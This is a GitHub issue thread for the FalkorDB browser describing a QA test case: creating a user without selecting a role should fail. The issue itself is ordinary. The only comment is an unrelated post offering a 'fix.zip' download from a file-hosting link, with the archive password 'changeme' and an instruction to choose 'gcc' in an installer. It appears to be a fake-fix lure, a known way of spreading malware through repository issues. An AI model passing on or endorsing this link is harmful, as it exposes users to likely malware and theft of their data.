### ISSUE TITLE
Settings Page: Handling user creation without selecting a role

### ISSUE THREAD

**Issue by Naseem77** [FalkorDB/falkordb-browser#385]
- **Title:** Verify that failing to select a role during user creation prevents the user from being created

- **Preconditions:**
The user is logged into the FalkorDB browser.

- **Test Steps:**-

1.  Navigate to the settings via the NavBar
2. Click on the "Users".
3. Click on the "Users" button in the top left corner.
4. Click on the "Add User" button in the top right corner.
5. Action: Fill in the details:
5.1. Name: TestUser
5.2. Password: "testPassword"
5.3. Role: Without selecting a user role
6. Click the "Add User" button on the pop-up window.
7. Verify that the user has not been created

- **Expected Result:**
The user should not appear in the user list.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
